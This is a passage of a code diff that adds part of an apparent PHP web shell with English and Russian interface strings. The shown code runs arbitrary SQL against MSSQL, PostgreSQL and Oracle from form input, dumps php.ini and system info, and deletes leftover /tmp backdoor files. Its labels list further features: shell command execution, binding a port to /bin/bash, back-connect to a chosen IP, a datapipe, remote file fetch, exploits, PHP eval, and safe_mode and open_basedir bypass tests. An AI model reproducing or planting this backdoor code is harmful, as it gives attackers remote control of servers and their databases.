+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
+      @mssql_free_result($res);
+      }
+     }
+   	@mssql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+   {
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @pg_query($db,$query);
+      $error = @pg_errormessage($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@pg_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @pg_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @pg_free_result($res);
+      }
+     }
+   	@pg_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>";
+  break;
+  case 'Oracle':
+  $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);
+  if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; }
+  else
+   {
+   $querys = @explode(';',$_POST['db_query']);
+   foreach($querys as $num=>$query)
+    {
+    if(strlen($query)>5) {
+    echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+    $stat = @ociparse($db, $query);
+    @ociexecute($stat);
+    if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; }
+    else
+     {
+     $rowcount = @ocirowcount($stat);
+     if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}
+     else {
+     echo "<table width=100%><tr>";
+     for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; }
+     echo "</tr>";
+     while(ocifetch($stat))
+      {
+      echo "<tr>";
+      for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; }
+      echo "</tr>";
+      }
+     echo "</table><br>";
+     }
+     @ocifreestatement($stat);
+     }
+    }
+    }
+   @ocilogoff($db);
+   }
+  break;
+  }
+ echo "<form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+/*
+&#1042;&#1099;&#1073;&#1086;&#1088; &#1103;&#1079;&#1099;&#1082;&#1072;
+$language='eng' - &#1088;&#1091;&#1089;&#1089;&#1082;&#1080;&#1081;
+$language='ru' - &#1072;&#1085;&#1075;&#1083;&#1080;&#1081;&#1089;&#1082;&#1080;&#1081;
+*/
+$language='eng';
+$lang=array(
+'ru_text1' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1085;&#1072;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1072;',
+'ru_text2' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076; &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077;',
+'ru_text3' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1091;',
+'ru_text4' =>'&#1056;&#1072;&#1073;&#1086;&#1095;&#1072;&#1103; &#1076;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103;',
+'ru_text5' =>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1072; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074; &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;',
+'ru_text6' =>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;',
+'ru_text7' =>'&#1040;&#1083;&#1080;&#1072;&#1089;&#1099;',
+'ru_text8' =>'&#1042;&#1099;&#1073;&#1077;&#1088;&#1080;&#1090;&#1077; &#1072;&#1083;&#1080;&#1072;&#1089;',
+'ru_butt1' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100;',
+'ru_butt2' =>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1080;&#1090;&#1100;',
+'ru_text9' =>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1080;&#1077; &#1087;&#1086;&#1088;&#1090;&#1072; &#1080; &#1087;&#1088;&#1080;&#1074;&#1103;&#1079;&#1082;&#1072; &#1077;&#1075;&#1086; &#1082; /bin/bash',
+'ru_text10'=>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1100; &#1087;&#1086;&#1088;&#1090;',
+'ru_text11'=>'&#1055;&#1072;&#1088;&#1086;&#1083;&#1100; &#1076;&#1083;&#1103; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1072;',
+'ru_butt3' =>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1100;',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-&#1072;&#1076;&#1088;&#1077;&#1089;',
+'ru_text14'=>'&#1055;&#1086;&#1088;&#1090;',
+'ru_butt4' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100;',
+'ru_text15'=>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1072; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074; &#1089; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1086;&#1075;&#1086; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;',
+'ru_text16'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;',
+'ru_text17'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;',
+'ru_text18'=>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;',
+'ru_text21'=>'&#1053;&#1086;&#1074;&#1086;&#1077; &#1080;&#1084;&#1103;',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1087;&#1086;&#1088;&#1090;',
+'ru_text24'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1093;&#1086;&#1089;&#1090;',
+'ru_text25'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1087;&#1086;&#1088;&#1090;',
+'ru_text26'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;',
+'ru_butt5' =>'&#1047;&#1072;&#1087;&#1091;&#1089;&#1090;&#1080;&#1090;&#1100;',
+'ru_text28'=>'&#1056;&#1072;&#1073;&#1086;&#1090;&#1072; &#1074; safe_mode',
+'ru_text29'=>'&#1044;&#1086;&#1089;&#1090;&#1091;&#1087; &#1079;&#1072;&#1087;&#1088;&#1077;&#1097;&#1077;&#1085;',
+'ru_butt6' =>'&#1057;&#1084;&#1077;&#1085;&#1080;&#1090;&#1100;',
+'ru_text30'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1092;&#1072;&#1081;&#1083;&#1072;',
+'ru_butt7' =>'&#1042;&#1099;&#1074;&#1077;&#1089;&#1090;&#1080;',
+'ru_text31'=>'&#1060;&#1072;&#1081;&#1083; &#1085;&#1077; &#1085;&#1072;&#1081;&#1076;&#1077;&#1085;',
+'ru_text32'=>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; PHP &#1082;&#1086;&#1076;&#1072;',
+'ru_text33'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; open_basedir &#1095;&#1077;&#1088;&#1077;&#1079; &#1092;&#1091;&#1085;&#1082;&#1094;&#1080;&#1080; cURL',
+'ru_butt8' =>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1080;&#1090;&#1100;',
+'ru_text34'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1092;&#1091;&#1085;&#1082;&#1094;&#1080;&#1102; include',
+'ru_text35'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1079;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1091; &#1092;&#1072;&#1081;&#1083;&#1072; &#1074; mysql',
+'ru_text36'=>'&#1041;&#1072;&#1079;&#1072;',
+'ru_text37'=>'&#1051;&#1086;&#1075;&#1080;&#1085;',
+'ru_text38'=>'&#1055;&#1072;&#1088;&#1086;&#1083;&#1100;',
+'ru_text39'=>'&#1058;&#1072;&#1073;&#1083;&#1080;&#1094;&#1072;',
+'ru_text40'=>'&#1044;&#1072;&#1084;&#1087; &#1090;&#1072;&#1073;&#1083;&#1080;&#1094;&#1099; &#1073;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;',
+'ru_butt9' =>'&#1044;&#1072;&#1084;&#1087;',
+'ru_text41'=>'&#1057;&#1086;&#1093;&#1088;&#1072;&#1085;&#1080;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083;&#1077;',
+'ru_text42'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1085;&#1080;&#1077; &#1092;&#1072;&#1081;&#1083;&#1072;',
+'ru_text43'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1090;&#1100; &#1092;&#1072;&#1081;&#1083;',
+'ru_butt10'=>'&#1057;&#1086;&#1093;&#1088;&#1072;&#1085;&#1080;&#1090;&#1100;',
+'ru_butt11'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1090;&#1100;',
+'ru_text44'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1085;&#1080;&#1077; &#1092;&#1072;&#1081;&#1083;&#1072; &#1085;&#1077;&#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;! &#1044;&#1086;&#1089;&#1090;&#1091;&#1087; &#1090;&#1086;&#1083;&#1100;&#1082;&#1086; &#1076;&#1083;&#1103; &#1095;&#1090;&#1077;&#1085;&#1080;&#1103;!',
+'ru_text45'=>'&#1060;&#1072;&#1081;&#1083; &#1089;&#1086;&#1093;&#1088;&#1072;&#1085;&#1077;&#1085;',
+'ru_text46'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; phpinfo()',
+'ru_text47'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1085;&#1072;&#1089;&#1090;&#1088;&#1086;&#1077;&#1082; php.ini',
+'ru_text48'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1080;&#1077; &#1074;&#1088;&#1077;&#1084;&#1077;&#1085;&#1085;&#1099;&#1093; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074;',
+'ru_text49'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1080;&#1077; &#1089;&#1082;&#1088;&#1080;&#1087;&#1090;&#1072; &#1089; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;',
+'ru_text50'=>'&#1048;&#1085;&#1092;&#1086;&#1088;&#1084;&#1072;&#1094;&#1080;&#1103; &#1086; &#1087;&#1088;&#1086;&#1094;&#1077;&#1089;&#1089;&#1086;&#1088;&#1077;',
+'ru_text51'=>'&#1048;&#1085;&#1092;&#1086;&#1088;&#1084;&#1072;&#1094;&#1080;&#1103; &#1086; &#1087;&#1072;&#1084;&#1103;&#1090;&#1080;',
+'ru_text52'=>'&#1058;&#1077;&#1082;&#1089;&#1090; &#1076;&#1083;&#1103; &#1087;&#1086;&#1080;&#1089;&#1082;&#1072;',
+'ru_text53'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1087;&#1072;&#1087;&#1082;&#1077;',
+'ru_text54'=>'&#1055;&#1086;&#1080;&#1089;&#1082; &#1090;&#1077;&#1082;&#1089;&#1090;&#1072; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;',
+'ru_butt12'=>'&#1053;&#1072;&#1081;&#1090;&#1080;',
+'ru_text55'=>'&#1058;&#1086;&#1083;&#1100;&#1082;&#1086; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;',
+'ru_text56'=>'&#1053;&#1080;&#1095;&#1077;&#1075;&#1086; &#1085;&#1077; &#1085;&#1072;&#1081;&#1076;&#1077;&#1085;&#1086;',
+'ru_text57'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;/&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100; &#1060;&#1072;&#1081;&#1083;/&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1102;',
+'ru_text58'=>'&#1048;&#1084;&#1103;',
+'ru_text59'=>'&#1060;&#1072;&#1081;&#1083;',
+'ru_text60'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1102;',
+'ru_butt13'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;/&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100;',
+'ru_text61'=>'&#1060;&#1072;&#1081;&#1083; &#1089;&#1086;&#1079;&#1076;&#1072;&#1085;',
+'ru_text62'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103; &#1089;&#1086;&#1079;&#1076;&#1072;&#1085;&#1072;',
+'ru_text63'=>'&#1060;&#1072;&#1081;&#1083; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;',
+'ru_text64'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;&#1072;',
+'ru_text65'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;',
+'ru_text66'=>'&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100;',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'&#1050;&#1086;&#1084;&#1072;&#1085;&#1076;&#1072;',
+'ru_text69'=>'&#1055;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088;1',
+'ru_text70'=>'&#1055;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088;2',
+'ru_text71'=>"&#1042;&#1090;&#1086;&#1088;&#1086;&#1081; &#1087;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099;:\r\n- &#1076;&#1083;&#1103; CHOWN - &#1080;&#1084;&#1103; &#1085;&#1086;&#1074;&#1086;&#1075;&#1086; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103; &#1080;&#1083;&#1080; &#1077;&#1075;&#1086; UID (&#1095;&#1080;&#1089;&#1083;&#1086;&#1084;) \r\n- &#1076;&#1083;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; CHGRP - &#1080;&#1084;&#1103; &#1075;&#1088;&#1091;&#1087;&#1087;&#1099; &#1080;&#1083;&#1080; GID (&#1095;&#1080;&#1089;&#1083;&#1086;&#1084;) \r\n- &#1076;&#1083;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; CHMOD - &#1094;&#1077;&#1083;&#1086;&#1077; &#1095;&#1080;&#1089;&#1083;&#1086; &#1074; &#1074;&#1086;&#1089;&#1100;&#1084;&#1077;&#1088;&#1080;&#1095;&#1085;&#1086;&#1084; &#1087;&#1088;&#1077;&#1076;&#1089;&#1090;&#1072;&#1074;&#1083;&#1077;&#1085;&#1080;&#1080; (&#1085;&#1072;&#1087;&#1088;&#1080;&#1084;&#1077;&#1088; 0777)",
+'ru_text72'=>'&#1058;&#1077;&#1082;&#1089;&#1090; &#1076;&#1083;&#1103; &#1087;&#1086;&#1080;&#1089;&#1082;&#1072;',
+'ru_text73'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1087;&#1072;&#1087;&#1082;&#1077;',
+'ru_text74'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;',
+'ru_text75'=>'* &#1084;&#1086;&#1078;&#1085;&#1086; &#1080;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100; &#1088;&#1077;&#1075;&#1091;&#1083;&#1103;&#1088;&#1085;&#1086;&#1077; &#1074;&#1099;&#1088;&#1072;&#1078;&#1077;&#1085;&#1080;&#1077;',
+'ru_text76'=>'&#1055;&#1086;&#1080;&#1089;&#1082; &#1090;&#1077;&#1082;&#1089;&#1090;&#1072; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093; &#1089; &#1087;&#1086;&#1084;&#1086;&#1097;&#1100;&#1102; &#1091;&#1090;&#1080;&#1083;&#1080;&#1090;&#1099; find',
+'ru_text77'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1089;&#1090;&#1088;&#1091;&#1082;&#1090;&#1091;&#1088;&#1099; &#1073;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;',
+'ru_text78'=>'&#1055;&#1086;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1090;&#1100; &#1090;&#1072;&#1073;&#1083;&#1080;&#1094;&#1099;',
+'ru_text79'=>'&#1055;&#1086;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1090;&#1100; &#1089;&#1090;&#1086;&#1083;&#1073;&#1094;&#1099;',
+'ru_text80'=>'&#1058;&#1080;&#1087;',
+'ru_text81'=>'&#1057;&#1077;&#1090;&#1100;',
+'ru_text82'=>'&#1041;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;',
+'ru_text83'=>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; SQL &#1079;&#1072;&#1087;&#1088;&#1086;&#1089;&#1072;',
+'ru_text84'=>'SQL &#1079;&#1072;&#1087;&#1088;&#1086;&#1089;',
+'ru_text85'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1074;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076; &#1074; MSSQL &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077;',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Table',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
